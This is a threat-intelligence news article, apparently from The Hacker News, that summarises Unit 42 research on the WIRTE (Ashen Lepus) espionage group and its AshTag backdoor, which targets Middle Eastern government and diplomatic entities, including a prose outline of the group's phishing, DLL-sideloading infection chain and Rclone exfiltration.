An advanced persistent threat (APT) known as WIRTE has been attributed to attacks targeting government and diplomatic entities across the Middle East with a previously undocumented malware suite dubbed AshTag since 2020.
Palo Alto Networks Unit 42 is tracking the activity cluster under the name Ashen Lepus. Artifacts uploaded to the VirusTotal platform show that the threat actor has trained its sights on Oman and Morocco, indicating an expansion in operational scope beyond the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt.
The company told The Hacker News said it has observed “scores of unique lures” disseminated across the Middle East, indicating a “persistent and wide-reaching campaign” confined to government and diplomatic entities in the region. More than a dozen entities are estimated to have been targeted, although it’s suspected that the real number could be higher.
“Ashen Lepus remained persistently active throughout the Israel-Hamas conflict, distinguishing it from other affiliated groups whose activities decreased over the same period,” the cybersecurity company said in a report shared with The Hacker News. “Ashen Lepus continued with its campaign even after the October 2025 Gaza ceasefire, deploying newly developed malware variants and engaging in hands-on activity within victim environments.”
WIRTE, which overlaps with an Arabic-speaking, politically motivated cluster known as Gaza Cyber Gang (aka Blackstem, Extreme Jackal, Molerats, or TA402), is assessed to be active since at least 2018. According to a report from Cybereason, both Molerats and APT-C-23 (aka Arid Viper, Desert Varnish, or Renegade Jackal) are two main sub-groups of the Hamas cyberwarfare division.
It’s primarily driven by espionage and intelligence collection, targeting government entities in the Middle East to meet its strategic objectives.
“Specifically, the connection between WIRTE (Ashen Lepus) to the broader Gaza Cyber Gang is primarily evidenced by code overlaps and similarities,” Unit 42 researchers said. “This suggests that while they operate independently, the tools were developed by close entities and they likely share development resources. We have also seen overlap in other groups’ victimology.”
In a report published in November 2024, Check Point attributed the hacking crew to destructive attacks exclusively aimed at Israeli entities to infect them with a custom wiper malware referred to as SameCoin, highlighting their ability to adapt and carry out both espionage and sabotage.
The long-running, elusive campaign detailed by Unit 42, going all the way back to 2018, has been found to leverage phishing emails with lures related to geopolitical affairs in the region. A recent increase in lures related to Turkey – e.g., “Partnership agreement between Morocco and Turkey” or “Draft resolutions concerning the State of Palestine” – suggests that entities in the country may be a new area of focus.
The attack chains commence with a harmless PDF decoy that tricks recipients into downloading a RAR archive from a file-sharing service. Opening the archive triggers a chain of events that results in the deployment of AshTag.
This involves using a renamed benign binary to sideload a malicious DLL dubbed AshenLoader that, in addition to opening a decoy PDF file to keep up the ruse, contacts an external server to drop two more components, a legitimate executable and a DLL payload called AshenStager (aka stagerx64) that’s again sideloaded to launch the malware suite in memory to minimize forensic artifacts.
AshTag is a modular .NET backdoor that’s designed to facilitate persistence and remote command execution, while masquerading as a legitimate VisualServer utility to fly under the radar. Internally, its features are realized by means of an AshenOrchestrator to enable communications and to run additional payloads in memory.
These payloads serve different purposes –
- Persistence and process management
- Update and removal
- Screen capture
- File explorer and management
- System fingerprinting
In one case, Unit 42 said it observed the threat actor accessing a compromised machine to conduct hands-on data theft by staging documents of interest in the C:UsersPublic folder. These files are said to have been downloaded from a victim’s email inbox, their end goal being the theft of diplomacy-related documents. The documents were then exfiltrated to an attacker-controlled server using the Rclone utility.
It’s assessed that data theft has likely occurred across the broader victim population, particularly in environments where advanced detection capabilities are absent.
“Ashen Lepus remains a persistent espionage actor, demonstrating a clear intent to continue its operations throughout the recent regional conflict — unlike other affiliated threat groups, whose activity significantly decreased,” the company concluded. “The threat actors’ activities throughout the last two years in particular highlight their commitment to constant intelligence collection.”
